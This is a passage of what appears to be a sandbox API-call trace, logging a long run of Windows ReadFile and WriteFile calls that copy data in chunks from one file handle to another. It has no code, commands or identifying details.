lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.227] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.228] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.228] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.229] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x26b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.229] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.230] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x28f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.230] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.231] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x23c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.231] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.232] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2df, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.232] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.233] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x336, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.233] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.234] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3c7, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.234] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.235] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x305, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.235] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.236] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x32c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.236] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.237] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x301, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.237] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.238] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x38a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.238] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.239] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3b5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.239] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.240] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3c4, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.240] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.241] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3b1, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.241] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.242] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x362, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.242] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.243] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ff, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.243] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.244] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x352, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.244] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.245] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x381, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.245] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.246] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3cf, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.246] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.247] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x397, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.247] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.248] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3b2, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.248] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.249] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.249] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x8a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.250] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.250] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.251] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.251] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.252] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.252] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x9f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.253] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.254] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.254] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x184, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.255] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.255] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.256] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.257] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.257] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x36c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.258] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.258] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.259] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.259] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.260] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.260] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xa1, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.261] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.261] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x39f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.262] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.262] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3a9, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.262] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.263] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.263] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.264] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.264] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.265] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x13, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.265] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.266] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.267] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x6e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.267] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.267] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.268] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.268] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.269] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.269] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.270] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.270] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.271] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.271] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.272] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.272] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.273] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.273] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.274] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.274] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.275] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.277] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.277] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.278] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.278] ReadFile (in: hFile=0x2b0, 